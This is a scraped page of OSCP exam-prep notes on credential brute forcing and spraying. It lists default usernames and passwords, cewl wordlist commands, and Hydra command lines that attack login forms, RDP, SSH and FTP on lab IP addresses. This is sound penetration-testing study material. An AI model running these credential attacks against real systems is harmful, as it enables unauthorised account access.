// notes/ Web Exploitation
🕸️
Brute Forcing And Spraying
Notes from oscp.adot8.com — web applications.
#web applications#adot8
source · oscp.adot8.com · web-applications/brute-forcing-and-spraying ↗Brute Forcing and Spraying
Common Usernames
code
01root02admin03administratorCommon Passwords
code
01admin02root03toor04password05Username:Username <--- upercase first letter06username:username <--- lowercase first letter07AppName:AppName <--- Test upper and lowerScrape website for potential passwords
code
01cewl <url>02cewl --lower <url>03cewl --upper <url>{% hint style="danger" %} Test uppercase and lowercase {% endhint %}
Hydra
Login Portals
Example 1
<figure><img src="/files/TXAiv8FTLJOdYB1EDcae" alt=""><figcaption></figcaption></figure>- Capture in Burp
- Username and Password converted to base64 upon sending
- Error code 403 = failed
code
01hydra -I -f -L usernames.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'hydra -I -vV -f -L users.txt -P passwords.txt 'http-post-form://192.168.165.61:8081/service/rapture/session:username=^USER64^&password=^PASS64^:C=/:F=403'
- I - ignore restore files
- vV - verbose mode
- f - stop upon success
- L - username list
- P - password list
- ^USER64^ ^PASS64^ - placements for username and password + base64 encode
- C=/ - establish session cookies at the URL
- F=403 - HTTP 403 means invalid login
Example 2
<figure><img src="/files/RlmPQ0OMNEJ16hpcYoVF" alt=""><figcaption></figcaption></figure>code
01hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 02http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"code
01hydra -l admin -P ~/rockyou.txt http-get://192.168.178.201 -vVOther services
code
01hydra -vV -L names.txt -p 'SuperS3cure1337#' 192.168.178.202 rdp -t 1002hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ssh03hydra -vV -l itadmin -P ~/rockyou.txt 192.168.178.202 -t 10 ftp